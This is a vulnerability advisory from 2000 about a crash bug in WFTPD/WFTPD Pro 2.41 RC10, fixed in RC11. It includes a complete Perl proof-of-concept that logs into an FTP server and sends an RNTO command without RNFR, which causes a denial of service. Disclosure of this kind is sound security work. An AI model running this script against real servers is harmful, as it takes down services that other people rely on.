wftpd241.txt

`================================================================  
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC10  
11/07/2000 (dd/mm/yyyy)  
  
[email protected]  
http://bluepanda.box.sk/  
================================================================  
  
Problem: An out of sequence RNTO command will cause WFTPD to crash.  
Vulnerable: WFTPD/WFTPD Pro 2.41 RC10, and prior.  
Immune: WFTPD/WFTPD Pro 2.41 RC11.  
  
==========  
Details:  
==========  
  
Anyone with a valid user/pass combination for a WFTPD server can cause it to  
terminate abnormally by issuing an RNTO command without first using RNFR.  
  
===================  
Proof of concept:  
===================  
  
#!/usr/bin/perl  
#  
# WFTPD/WFTPD Pro 2.41 RC10 denial-of-service  
# Blue Panda - [email protected]  
# http://bluepanda.box.sk/  
#  
# ----------------------------------------------------------  
# Disclaimer: this file is intended as proof of concept, and  
# is not intended to be used for illegal purposes. I accept  
# no responsibility for damage incurred by the use of it.  
# ----------------------------------------------------------  
#  
# Issues an RNTO command without first using RNFR, causing WFTPD to crash.  
#  
  
use IO::Socket;  
  
$host = "ftp.host.com" ;  
$port = "21";  
$user = "anonymous";  
$pass = "p\@nda";  
$wait = 10;  
  
# Connect to server.  
print "Connecting to $host:$port...";  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";  
print "done.\n";  
  
# Login and issue premature RNTO command.  
print $socket "USER $user\nPASS $pass\nRNTO x\n";  
  
# Wait a while, just to make sure the commands have arrived.  
print "Waiting...";  
$time = 0;  
while ($time < $wait) {  
sleep(1);  
print ".";  
$time += 1;  
}  
  
# Finished.  
close($socket);  
print "\nConnection closed. Finished.\n"  
  
`